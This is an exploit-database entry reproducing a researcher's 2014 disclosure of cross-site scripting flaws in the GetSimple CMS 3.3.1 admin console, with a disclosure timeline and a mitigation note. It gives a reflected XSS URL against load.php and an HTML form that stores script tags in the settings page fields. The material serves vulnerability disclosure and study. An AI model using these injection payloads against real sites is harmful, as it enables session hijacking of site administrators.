PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1

vendor:

GetSimple CMS

by:

Pedro Ribeiro

7,5

CVSS

HIGH

Reflected XSS and Persistent XSS

CWE

Product Name: GetSimple CMS

Affected Version From: 3.3.1

Affected Version To: 3.3.1

Patch Exists: YES

Related CWE: CVE-2014-1603

CPE: a:get-simple-cms:get-simple-cms:3.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1

Reflected XSS can be exploited by sending a maliciously crafted URL to the vulnerable application. The malicious URL contains a script which is executed by the vulnerable application. Persistent XSS can be exploited by sending a maliciously crafted form to the vulnerable application. The malicious form contains a script which is stored by the vulnerable application and executed when the stored data is retrieved.

Mitigation:

Input validation, output encoding, and proper access control should be implemented to prevent XSS attacks.

Source

Exploit-DB raw data:

PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Disclosure: 12/05/2014 / Last updated: 12/10/2014

Timeline:
	04/11/2013 - Found bugs, produced proof of concept.
	05/11/2013 - Communicated to the developer, which acknowledged receipt.
	10/01/2014 - Politely asked the developer for progress, no response.
	17/01/2014 - Received CVE number from MITRE.
	20/01/2014 - Communicated CVE number to the developer, no response.
	29/01/2014 - Politely asked the developer for progress, no response.
	12/05/2014 - Public release.
==============================

Reflected XSS in plugin load page:
	http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>

Persistent XSS in settings page:
	<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
	<input type="text" name="user" value=""><script>alert(1);</script>">
	<input type="text" name="email" value=""><script>alert(2);</script>">
	<input type="text" name="name" value=""><script>alert(3);</script>">
	<input type="hidden" name="submitted" value="Save Settings">
	<input type="submit" value="Submit">
	</form>


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>